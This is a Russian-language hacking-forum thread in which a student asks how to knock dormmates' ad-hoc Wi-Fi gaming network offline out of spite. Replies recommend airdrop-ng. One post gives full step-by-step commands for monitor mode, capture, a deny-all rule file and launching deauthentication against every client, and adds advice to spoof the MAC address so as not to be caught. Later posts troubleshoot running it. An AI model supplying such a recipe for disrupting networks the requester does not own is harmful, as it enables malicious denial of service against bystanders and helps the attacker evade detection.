Возможно ли заддосить влан (подключение по ad-hoc)?

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by nitx, 25 Dec 2010.

  1. nitx

    nitx Elder - Старейшина

    Joined:
    4 Jan 2008
    Messages:
    214
    Likes Received:
    31
    Reputations:
    10
    Здраствуйте. Возможно надо было создать в болталке, но пусть пока этот топик будет тут.
    Вобщем меня задолбали всякие задроты, которые постоянно играют у меня в комнате (живу в общаге). Подключаются они между собой по ad-hoc. Всего в сети около 8-10 компьютеров. Я могу к их сети цепляться спокойно. В моем распряжении всего 1 ноут.
    Возможно ли заддосить их сеть? Хотя бы так, чтобы просто были лаги сильные и играть было неприятно.
     
  2. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,378
    Likes Received:
    2,778
    Reputations:
    231
    мало информации. чрезвычайно мало.
    тип ключа при соединении к ВайФай - WEP WPA?

    ты на каком уже курсе в инсте? ))
     
  3. nitx

    nitx Elder - Старейшина

    Joined:
    4 Jan 2008
    Messages:
    214
    Likes Received:
    31
    Reputations:
    10
    WEP

    Это важно?)
    На 1.
     
  4. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,378
    Likes Received:
    2,778
    Reputations:
    231
    так вот.
    вместо WEP ставится WPA,
    и никому не будет дела до твоей точки.

    если у меня в округе:
    Code:
    Cell 01
    IE: WPA Version 1
    
    Cell 02
    Encryption key:off
    
    Cell 03
    IE: WPA Version 1
    
    так к какой точке захочу приконнектится ? ))
     
  5. Kastor

    Kastor Elder - Старейшина

    Joined:
    19 Jan 2010
    Messages:
    127
    Likes Received:
    18
    Reputations:
    13
    Походу возможно задосить их всех сразу. Для этого разберись с программой airdrop-ng. Она в BackTrack 3 есть (под винду наверное нет подобной). Там можно создать правило, при котором никто ни к какой сети подключиться не сможет. То есть можно рубить тупо всех. Подробнее о ней почитай в журнале Хакер №139 август 2010. Статья называется "Вардрайвинг в нашем веке".
     
  6. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,040
    Likes Received:
    500
    Reputations:
    285
    если умееш пользоваться бектреком то легко в етом же разделе есть команды которыек вырубают роутер ;-) ... ты можеш себе представить какое ето западло ))) ..... можна на секунды поставить но только бектреком . да я если б спалил такую фигню ноутбук бы на бошку натянул :) .... с другой стороны мне не светит ето в игры я лет 10 наверное не играю ...... юзай но с умом. без западла а то западло наказуемо
     
  7. Evrei

    Evrei Member

    Joined:
    14 Dec 2010
    Messages:
    4
    Likes Received:
    5
    Reputations:
    1
    Ахаха)) Добрые цели) пусть ребята лучше учатся, а не играют =))
    Главное не забудь сменить MAC адрес своей карточки) Среди геймеров всегда найдется один умник, который почует подвох)


    На вот, чтоб не искать)) Да мало ли еще кто захочет почитать:

    Как пользоваться: AIRDROP-NG

    Airdrop-ng написан на Python и требует для работы
    установленный airodump-ng и библиотеку Lorcon 1. Но
    если использовать Backtrack, то все необходимое и сама
    утилита без проблем установится из стандартного репо-
    зитория:
    Code:
    apt-get update
    apt-get install airdrop-ng
    Схема использования мало чем отличается от знакомых
    нам атак:
    1) Первым делом надо перевести Wi-Fi-карту в режим
    мониторинга:
    Code:
    airmon-ng start wlan0
    2) Далее запустить беспроводный сниффер airodump,
    сконфигурировав его вывод в .csv-файл:
    Code:
    airodump-ng -w dumpfile --output-format csv
    mon0
    3) После этого создаем файл с правилами для AirDrop.
    Возьмем для примера описанное выше правило, запре-
    щающее соединения с AP, у которой mac = 00-11-22-33-
    44-55, и запишем его в файл rules:
    Code:
    nano rules
    d/00-11-22-33-44-55|any
    4) Все, осталось запустить сам airdrop-ng, прилинковав-
    шись к csv-выводу сниффера и конфигу с правилами:
    Code:
    airdrop-ng -i mon0 -t dumpfile.csv -r rules
    Утилита начнет свою работу, выводя сообщения об
    отправленных в сеть пакетах. Если помимо прочего
    указать ключ "-b", дополнительно будет выводиться под-
    робный отчет. В результате на консоль будут выводиться
    сообщения, каким клиентам и где было разрешено или
    запрещено соединение. Как я уже сказал, условия могут
    быть намного более гибкими, это достигается с помощью
    каскада правил:
    Code:
    #Allow-правило
    a/00-11-22-33-44-55|55-44-33-22-11-00
    Code:
    #Deny-правило
    d/00-11-22-33-44-55|any
    Таким образом, мы разрешаем доступ к точке клиенту с
    MAC-адресом 55-44-33-22-11-00, в то время как для всех
    остальных соединение по-прежнему останется недо-
    ступным. Получается, Airdrop-ng можно использовать как
    простейшую систему контроля доступа :). И это без какого-
    либо доступа к админке точки!
     
    2 people like this.
  8. Ubnt

    Ubnt Member

    Joined:
    19 Dec 2010
    Messages:
    82
    Likes Received:
    6
    Reputations:
    0
    когда вхожу в аирдроп и ввожу airdrop-ng -i mon0 -t dumpfile.csv -r rules то выдаёт нет такой команды, просмотрел вроде надо писать airdrop-ng.py но тогдавыдаёт что адаптер не мониторит хотя он мониторит. Я :confused:
     
  9. Ubnt

    Ubnt Member

    Joined:
    19 Dec 2010
    Messages:
    82
    Likes Received:
    6
    Reputations:
    0
    вот и видео надыбал http://www.youtube.com/watch?v=Wml82Q22bSY

    как правильно прописать путь к файлам
    airdrop-ng -i mon0 -t root/dumpfile.csv -r root/rules
    запуск бт стандартно с диска???
     
    #9 Ubnt, 6 Jan 2011
    Last edited: 6 Jan 2011
Loading...